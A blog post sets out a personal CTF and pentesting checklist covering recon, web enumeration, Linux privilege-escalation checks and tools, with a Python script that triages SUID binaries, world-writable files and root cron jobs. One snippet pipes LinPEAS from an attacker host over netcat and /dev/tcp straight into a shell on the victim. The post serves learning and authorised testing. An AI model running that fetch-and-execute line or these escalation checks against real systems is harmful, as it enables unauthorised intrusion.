To create a better workflow during CTFs and pentests, I wanted to build a checklist to bring more consistency to my process. It also gives me insight into the simple things that are easy to overlook. In this post, I’ll walk through the different phases of my checklist and share some of the thoughts behind it.
Initial recon
For most CTFs, initial recon is pretty straightforward: we start with an nmap scan and investigate based on open ports. But in pentesting (especially in black-box scenarios), we often don’t get much to begin with. That’s why I added a few more steps:
- Gather IP ranges
- WHOIS Lookup
- DNS enumeration
- Google dorking
These steps help make sure I don’t miss any publicly available information before diving into the target itself.
Enumerating & Vulnerability scanning
In a real pentest, time is limited, so automation becomes important. I’m starting to explore tools like Nessus and OpenVAS for this. But since most of my time goes into CTFs, I’ve been mostly doing manual testing — especially on webapps, which I really enjoy. Here are my go-to web enumeration steps:
- Check for `robots.txt` and `sitemap.xml`
- Use Gobuster to find hidden subdirectories
- Use ffuf to brute-force subdomains
- Inspect page source code and JavaScript
- Look for injection points (SQL, XSS, etc.)
- Test upload functions
- Check for log poisoning opportunities
For non-web services (from the nmap scan), I often use HackTricks as a guide to help me enumerate further and understand common attack paths.
Initial access & privilege escalation
Once I have a foothold, the focus shifts to privilege escalation. On web apps, this can mean abusing password-reset flows or other application functionality. On Linux, I split my checks into global and user-level steps:
Global checks:
- Kernel version: `uname -a`
- Sudo rights: `sudo -l`
- Check for vulnerable `sudo` versions
- Password reuse across users
- Cronjobs running as root
- World-writable files/scripts
- Run LinPEAS. Rather than writing it to disk, serve it from the attack host with netcat and pipe it straight into a shell on the victim (10.10.10.10 is the attacker's IP):

```bash
sudo nc -q 5 -lvnp 80 < linpeas.sh       # attack host
cat < /dev/tcp/10.10.10.10/80 | sh       # victim
```
User-level checks:
- Check user group memberships
- Look for password reuse
- Check environment variables
- Look for SSH keys
- Check for hidden files
- Check SUID binaries:

```bash
find / -perm -4000 -type f 2>/dev/null
```
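Several of the checks above (SUID binaries, world-writable files, root cron jobs) are file-system questions that can be asked in one pass. The script below is an added example for this post; it is not LinPEAS and not the author's own tooling. It takes a filesystem root so it can run against `/` on a target or against a copied-out directory, parses `/etc/crontab` as text so that part is testable, and cross-checks root cron jobs against files the current user can write. The crontab sample is constructed, and `KNOWN_SUID_ABUSABLE` is a deliberately small subset of binaries that GTFOBins documents as abusable when SUID, not an exhaustive list.

```python
"""Linux privesc triage: SUID, world-writable files, and root cron jobs with writable scripts.

Added example for this post; not LinPEAS and not the author's script. Pass a
root directory (default /) or point the functions at a copied-out tree.
"""
import os
import stat
import sys

# Small subset of binaries that GTFOBins documents as abusable when SUID.
# Deliberately incomplete: any unexpected SUID binary still deserves a manual look.
KNOWN_SUID_ABUSABLE = {"bash", "find", "vim", "python", "python3", "perl", "awk", "less", "nano", "env"}

# Constructed /etc/crontab-style sample, not from a real host.
SAMPLE_CRONTAB = """SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/backup/cleanup.sh
0  3    * * *   www-data /var/www/rotate_logs.sh
"""


def walk_files(root):
    """Yield (path, lstat) for regular files under root without following symlinks."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st


def find_suid(root):
    """Equivalent of: find ROOT -perm -4000 -type f 2>/dev/null"""
    return sorted(p for p, st in walk_files(root) if st.st_mode & stat.S_ISUID)


def find_world_writable(root):
    """Regular files anyone can modify (o+w); a script here that root executes is a privesc path."""
    return sorted(p for p, st in walk_files(root) if st.st_mode & stat.S_IWOTH)


def flag_suid(paths):
    """SUID binaries whose basename is in the known-abusable subset."""
    return [p for p in paths if os.path.basename(p) in KNOWN_SUID_ABUSABLE]


def parse_system_crontab(text):
    """Parse /etc/crontab format (5 schedule fields, user, command); skip env lines and comments."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append({"user": parts[5], "command": parts[6]})
    return jobs


def root_jobs_with_writable_script(crontab_text, is_writable=lambda p: os.access(p, os.W_OK)):
    """Root cron jobs whose first command token is an absolute path the current user can write."""
    hits = []
    for job in parse_system_crontab(crontab_text):
        if job["user"] != "root":
            continue
        script = job["command"].split()[0]
        if script.startswith("/") and is_writable(script):
            hits.append(job)
    return hits


def self_check():
    """Build a throwaway tree with one SUID 'find' and one o+w script, then triage it."""
    import tempfile
    d = tempfile.mkdtemp()
    suid_bin = os.path.join(d, "find")
    open(suid_bin, "w").close()
    os.chmod(suid_bin, 0o4755)  # may be silently refused on some filesystems; reported in suid_set
    script = os.path.join(d, "cleanup.sh")
    open(script, "w").close()
    os.chmod(script, 0o666)
    suid = find_suid(d)
    return {"suid_set": bool(os.lstat(suid_bin).st_mode & stat.S_ISUID),
            "suid": suid, "abusable": flag_suid(suid), "writable": find_world_writable(d)}


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    suid = find_suid(root)
    print("[*] SUID binaries:", *suid, sep="\n    ")
    print("[!] Known-abusable SUID:", *flag_suid(suid), sep="\n    ")
    print("[*] World-writable files:", *find_world_writable(root), sep="\n    ")
    try:
        crontab = open("/etc/crontab").read()
    except OSError:
        crontab = SAMPLE_CRONTAB  # fall back to the constructed sample when /etc/crontab is unreadable
    for job in root_jobs_with_writable_script(crontab):
        print("[!] root cron job with writable script:", job["command"])
```

The cron check only looks at the first token of each command and only when it is an absolute path; `cd / && run-parts ...` style entries are skipped, which is intentional (the interesting case is a root job that points directly at a script you can edit). Per-user crontabs under `/var/spool/cron` and `/etc/cron.d` use the same field layout and can be fed to the same parser.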
Tools that keep coming back
Certain tools keep proving their value in almost every challenge or test:
- Burp Suite / ZAP – for web proxying and testing
- Gobuster / ffuf – for brute-force discovery
- Hydra – for login brute-forcing
- LinPEAS – for privilege escalation
- John / Hashcat – for password cracking
Topics I Want to Explore
As I continue to grow, I’ve realized there are still many areas in pentesting I haven’t explored yet. A few that are on my radar:
- Network pentesting
- Security evasion techniques
- Automated vulnerability pipelines
- Social Engineering & phishing
The field is massive — becoming a true all-rounder may not be realistic quickly, but I believe it’s achievable with consistent progress. One step at a time.
A Note on Active Directory (AD)
Right now, my checklist is mostly focused on web and Linux environments, simply because that’s where I’ve gained the most hands-on experience through CTFs and internal tests. But Active Directory is a huge part of real-world pentesting, especially in internal assessments. So even though I don’t have a full workflow for AD yet, it’s an area I’m actively planning to dive into.
Some key topics I want to explore in this space:
- Basic AD enumeration (users, groups, shares)
- Kerberos attacks (e.g. Kerberoasting, AS-REP roasting)
- Pass-the-Hash / Pass-the-Ticket
- BloodHound & SharpHound analysis
- Abuse of misconfigured ACLs
I’ll update this post and my GitBook once I’ve built a more complete checklist and gained real practice with these.
What's next?
I know many of these items are basic — and that’s exactly the point. Basics get skipped more often than you’d think. Missing them can mean missing the entire attack path. I’ll be sharing my checklist soon, probably in the form of a GitBook or similar platform. I’m also working on collecting my CEH and other study notes in the same place. It’s a work in progress, but I hope it will help others too. The checklist will grow over time as my experience does. This post is just a snapshot of where I’m at now — and that’s perfectly fine.